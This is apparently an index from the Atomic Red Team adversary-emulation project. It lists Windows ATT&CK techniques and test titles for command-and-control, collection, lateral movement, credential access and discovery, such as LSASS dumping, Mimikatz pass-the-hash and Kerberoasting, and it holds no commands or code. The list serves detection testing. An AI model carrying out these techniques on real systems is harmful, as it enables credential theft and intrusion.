- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- Atomic Test #21: MAZE Propagation Script [windows]
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- Atomic Test #26: Download a file using wscript [windows]
- Atomic Test #28: Nimgrab - Transfer Files [windows]
- Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1021.002 Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1076 Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1021.001 Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1077 Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
- Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe [windows]
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
- [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
- Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- Atomic Test #8: CertUtil ExportPFX [windows]
- Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
- Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
- Atomic Test #11: Export Certificates with Mimikatz [windows]
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with createdump.exe from .Net v5 [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
- Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
- Atomic Test #8: Password Spray using Kerbrute Tool [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
- Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1649 Steal or Forge Authentication Certificates](../../T1649/T1649.md)
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access unattend.xml [windows]
- Atomic Test #7: WinPwn - sensitivefiles [windows]
- Atomic Test #8: WinPwn - Snaffler [windows]
- Atomic Test #9: WinPwn - powershellsensitive [windows]
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
- Atomic Test #1: PetitPotam [windows]
- Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
- T1174 Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
- Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
- Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
- Atomic Test #4: Request A Single Ticket via PowerShell [windows]
- Atomic Test #5: Request All Tickets via PowerShell [windows]
- Atomic Test #6: WinPwn - Kerberoasting [windows]
- Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1003.006 OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- Atomic Test #6: System Discovery - SocGholish whoami [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- Atomic Test #3: WinPwn - GPOAudit [windows]
- Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- Atomic Test #15: WinPwn - generaldomaininfo [windows]
- Atomic Test #16: Kerbrute - userenum [windows]
- Atomic Test #17: Wevtutil - Discover NTLM Users Remote [windows]
- Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties [windows]
- Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property [windows]
- Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope [windows]
- Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties [windows]
- Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
